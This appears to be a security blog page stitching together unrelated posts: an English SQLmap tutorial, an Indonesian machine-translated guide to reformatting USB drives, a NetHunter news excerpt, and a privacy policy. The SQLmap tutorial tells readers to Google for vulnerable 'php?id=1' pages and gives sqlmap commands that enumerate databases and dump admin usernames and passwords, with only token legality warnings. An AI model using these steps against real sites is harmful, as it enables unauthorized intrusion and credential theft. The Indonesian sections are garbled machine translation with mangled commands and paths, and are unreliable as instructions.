How To Use SQLmap for SQL Injection – Find Website Admin Password

How to test if a website is vulnerable to SQL injection.  To be legal, use your own website.

Step 1 – Google for php?=id1
Google for php?=id1

add a Single quote… to the end of the URL.

so it reads php?=id1′
If you get an error the website is vulnerable.   Go to step 2.
If this is your own website – shut it down immediately.  You need to secure it before you bring it back online.

Step 2 – Kali SQLMAP – get website databases
SQLMAP   – u http:\\website.com/page.php?id=1 –dbs
This will fetch all available databases on the website.  Did you see them listed?

Step 3 – Find the LOGIN table
SQLMAP   – u http:\\website.com/page.php?id=1 –D www – tables
Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!

Step 4 – Get all the Login Data (from Step 3)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
This should display columns with items such as Cookie, ID, IP, Password, Username.

Step 5 – Get Usernames (& Admin)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
Look for “admin”

Step 6 – Get Passwords (of Admin)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
That’s it.

Game over!
Continue Reading

Bagaimana memformat pena USB di Linux

Kita dapat memformat USB di ext3 (format linux) atau vfat (untuk Windows dan Linux) mesin.

Step 1 - Cari tahu nama yang tepat dari USB

Misalkan 'Mount'

'Mount' akan keluar dari daftar / dev / sdxx daftar untuk semua drive. Kita juga bisa menggunakan :

ls / dev
Untuk mendapatkan tampilan real-time dari / var / log pesan mengajukan / perintahnya adalah

sudo tail -f / var / log / messages
Anda akan melihat perangkat dilaporkan ... tekan control + c untuk mendapatkan kembali prompt.

Jika itu pen USB, itu sangat mungkin drive

/ Dev / sdb1
Sangat penting untuk mengetahui bahwa / dev / sdb adalah seluruh perangkat dan / dev / sdb1 adalah partisi pertama pada perangkat.


Step 2 - Lepas USB
** Melihat ejaan .. itu umount
 umount / dev / sdb1

Step 3 - Buat Filesystem baru dengan FDISK
sudo umount / dev / sdb1
sudo fdisk / dev / sdb
Hal pertama yang harus dilakukan adalah exame partisi yang ada, kami melakukan ini dengan memasukkan P pada prompt. Memasuki L akan daftar semua jenis file mungkin, dan T akan mengubah sistem ID partisi ini.  The Hex kode untuk Linux adalah 83.

Sampai saat ini, perangkat belum tersentuh, semua perubahan yang disimpan dalam memori bukan perangkat fisik. Untuk menghemat, kita menulis menggunakan W. Jika Anda ingin meninggalkan perangkat berubah, masukkan q pada prompt untuk keluar FDISK tanpa menulis perubahan. Abaikan "malapetaka dan kesuraman" pesan peringatan.

Step 4 - Membuat filesystem baru dengan mkfs - mengkonversi ke filesystem ext3 Linux.
mkfs berarti "membuat filesystem" pada flash drive kita.

sudo mkfs-t ext3 / dev / sdb1

Ini berarti "membuat filesystem", dari "jenis ext 3" pada "perangkat" di "/ sdb1"
Saksikan inode dan file sistem yang diciptakan

atau bisa juga seperti step di bawah ini

Step 5 - memformat USB kembali ke VFAT untuk Windows
Untuk memformat perangkat untuk filesystem FAT32 aslinya, tentukan VFAT sebagai jenis filesystem.

sudo mkfs -t vfat / dev / sdb1

VFAT memungkinkan kedua Linux dan Windows untuk membaca / menulis ke USB. Namun ia memiliki 4 GB batas file tunggal .. yang mungkin menangkap Anda jika Anda mencoba untuk menulis mengatakan CentOS 6.5 DVD ISO ke USB ... sebagai filesize adalah 4,3 GB.
Langkah 6 - Periksa filesystem dengan fsck
Fsck dapat memperbaiki filesystem yang korup. Bagian pulih dari file ditempatkan di direktori lost + found, di setiap root filesystem.

sudo fsck / dev / sdb1

Pendaftaran - Saya berada di Mesin Backtrack pada saat itu ... maaf - saya masih buruk!

Mengapa unmounting sangat penting?

Dalam output dari "bebas" perintah kita melihat statistik termasuk BUFFERS. Dalam rangka untuk membuat sistem bekerja secepat mungkin, data dikirim ke buffer, penulisan ke perangkat fisik sering ditangguhkan untuk waktu mendatang. Data menumpuk dalam memori. Kadang-kadang OS akan menulis data ini untuk perangkat fisik. Unmount perangkat memungkinkan semua data yang tersisa yang akan ditulis ke perangkat sehingga bisa dihapus secara aman. Jika perangkat dihapus tanpa terpasang, beberapa data mungkin hilang. Dalam beberapa kasus, data ini mungkin termasuk update direktori penting, yang akan menghasilkan korupsi filesystem, yang merupakan salah satu hal terburuk yang bisa terjadi.
Continue Reading

Bagaimana mengubah Ponsel Android Anda menjadi terminal hacker - NetHunter

http://thehackernews.com/2014/09/kali-linux-nethunter-turn-your-android.html

Para pengembang salah satu yang paling keren sistem operasi muka adalah open source untuk pengujian penetrasi, ' KALI Linux ' dan telah diumumkan kemarin merilis sebuah proyek Kali baru, yang dikenal sebagai NetHunter, yang berjalan pada perangkat Google Nexus.
Kali Linux adalah sistem operasi open source berbasis Debian untuk pengujian penetrasi dan forensik, yang dikelola dan didanai oleh Serangan Keamanan, penyedia pelatihan keamanan informasi kelas dunia dan jasa pengujian penetrasi. Muncul dibungkus dengan koleksi pengujian penetrasi dan monitoring jaringan alat yang digunakan untuk pengujian privasi perangkat lunak dan keamanan.
Setelah membuat pengaruhnya di hacker dan keamanan lingkaran, Kali Linux kini telah diterbitkan dengan Kali Nethunter, versi dari suite keamanan untuk perangkat Android. Alat ini adalah distribusi mobile yang dirancang untuk kompromi sistem melalui USB ketika diinstal dan dijalankan pada ponsel Android.
Kali Linux NetHunter proyek memberikan banyak kekuatan untuk pengguna Nexus, yang menjalankan platform pengujian penetrasi NetHunter sekarang dapat memulai serangan termasuk keyboard yang amat kecil melalui HID serangan gaya dan BadUSB-man-in-the-middle (MITM) jaringan serangan melalui USB perangkat antarmuka manusia (HID), wireless injeksi bingkai 802.11, dan bisa setup dijalur akses jahat dalam satu klik.
Continue Reading

Policy Privacy

Privacy Policy for Learn Security and Privacy

If you require any more information or have any questions about our privacy policy, please feel free to contact us by email at http://tutorialsec.blogspot.com/Contact-us.html.
At tutorialsec.blogspot.com we consider the privacy of our visitors to be extremely important. This privacy policy document describes in detail the types of personal information is collected and recorded by tutorialsec.blogspot.com and how we use it.
Log Files
Like many other Web sites, tutorialsec.blogspot.com makes use of log files. These files merely logs visitors to the site - usually a standard procedure for hosting companies and a part of hosting services's analytics. The information inside the log files includes internet protocol (IP) addresses, browser type, Internet Service Provider (ISP), date/time stamp, referring/exit pages, and possibly the number of clicks. This information is used to analyze trends, administer the site, track user's movement around the site, and gather demographic information. IP addresses, and other such information are not linked to any information that is personally identifiable.
Cookies and Web Beacons
tutorialsec.blogspot.com uses cookies to store information about visitors' preferences, to record user-specific information on which pages the site visitor accesses or visits, and to personalize or customize our web page content based upon visitors' browser type or other information that the visitor sends via their browser.
DoubleClick DART Cookie
→ Google, as a third party vendor, uses cookies to serve ads on tutorialsec.blogspot.com.
→ Google's use of the DART cookie enables it to serve ads to our site's visitors based upon their visit to tutorialsec.blogspot.com and other sites on the Internet.
→ Users may opt out of the use of the DART cookie by visiting the Google ad and content network privacy policy at the following URL - http://www.google.com/privacy_ads.html
Our Advertising Partners
Some of our advertising partners may use cookies and web beacons on our site. Our advertising partners include ....... 
  • Google
While each of these advertising partners has their own Privacy Policy for their site, an updated and hyperlinked resource is maintained here: Privacy Policies.
You may consult this listing to find the privacy policy for each of the advertising partners of tutorialsec.blogspot.com.
These third-party ad servers or ad networks use technology in their respective advertisements and links that appear on tutorialsec.blogspot.com and which are sent directly to your browser. They automatically receive your IP address when this occurs. Other technologies (such as cookies, JavaScript, or Web Beacons) may also be used by our site's third-party ad networks to measure the effectiveness of their advertising campaigns and/or to personalize the advertising content that you see on the site.
tutorialsec.blogspot.com has no access to or control over these cookies that are used by third-party advertisers.
Third Party Privacy Policies
You should consult the respective privacy policies of these third-party ad servers for more detailed information on their practices as well as for instructions about how to opt-out of certain practices. tutorialsec.blogspot.com's privacy policy does not apply to, and we cannot control the activities of, such other advertisers or web sites. You may find a comprehensive listing of these privacy policies and their links here: Privacy Policy Links.
If you wish to disable cookies, you may do so through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers' respective websites. What Are Cookies?
Children's Information
We believe it is important to provide added protection for children online. We encourage parents and guardians to spend time online with their children to observe, participate in and/or monitor and guide their online activity. tutorialsec.blogspot.com does not knowingly collect any personally identifiable information from children under the age of 13. If a parent or guardian believes that tutorialsec.blogspot.com has in its database the personally-identifiable information of a child under the age of 13, please contact us immediately (using the contact in the first paragraph) and we will use our best efforts to promptly remove such information from our records.
Online Privacy Policy Only
This privacy policy applies only to our online activities and is valid for visitors to our website and regarding information shared and/or collected there. This policy does not apply to any information collected offline or via channels other than this website.
Consent
By using our website, you hereby consent to our privacy policy and agree to its terms.
Privacy Policy Online Approved Site
Update
This Privacy Policy was last updated on: Tuesday, July 28th, 2015.
Should we update, amend or make any changes to our privacy policy, those changes will be posted here.
Continue Reading